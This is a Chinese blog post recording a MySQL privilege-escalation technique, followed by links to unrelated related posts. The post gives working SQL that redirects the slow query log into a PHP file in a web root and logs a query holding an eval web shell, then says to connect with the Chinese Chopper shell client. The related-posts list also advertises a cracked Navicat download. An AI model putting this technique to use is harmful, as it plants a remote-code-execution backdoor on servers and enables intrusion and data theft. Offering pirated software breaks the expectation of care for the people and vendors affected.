mysql提权记录,mysql日志提权
成功提权,记录一下,具体执行sql:
set GLOBAL slow_query_log =1; set GLOBAL long_query_time =1; set GLOBAL slow_query_log_file = 'E:/phpStudy/WWW/25.php'; SELECT "<?php eval($_POST['a']);?>" or sleep(11);
原理:设置sql慢查询的秒数,执行超时会把sql保存为文件,我们把查询语句改为php代码即可,然后上菜刀即可。
“mysql提权记录,mysql日志提权” 的相关文章
c#中string和StringBuilder效率对比
c#中string和StringBuilder直接看看执行速度。(2).String类型累计赋值Test ...
svn自动更新到网站
【一】.钩子文件的设置和创建(1).打开hooks目录,可以看到有一个post-commit.tmpl文件,这是一个模板文件。复制一份,重命名为post-commit,将其用户组设为www,并设置为可执行。chown www:www post-commitchmod +x post-commit(2...
Git推送文件到远程仓库
1.远程仓库的协作模式开发者把自己最新的版本推到线上仓库,同时把线上仓库的最新代码,拉到自己本地即可2.注册git帐号国外: http://www.github.com国内: http://git.oschina.net2.在码云创建项目,不要初始化readmegit push https://gi...
c#关闭计算机的代码
1.关机Process.Start("shutdown", "-s -t 0"); 2. 注销 Proc...
nginx配置https,nginx ssl配置
首先在阿里云申请免费的证书,选择自动生成证书。然后就是nginx虚拟主机配置文件的修改。以下是我的配置文件(因为公司开发小程序,没有办法只能使用https)。您只需要关注带有ssl的配置选项,我增加了一个监听80和443的端口,同时增加了http跳转https的配置server &nbs...
navicat for mysql 11.1.13 企业破解版
navicat for mysql 11.1.13 企业破解版.绿色软件免安装,请直接打开安装说明.一定要看说明.下载地址: http://pan.baidu.com/s/1dFINxNN下载链接失效,直接点击上方QQ呼叫...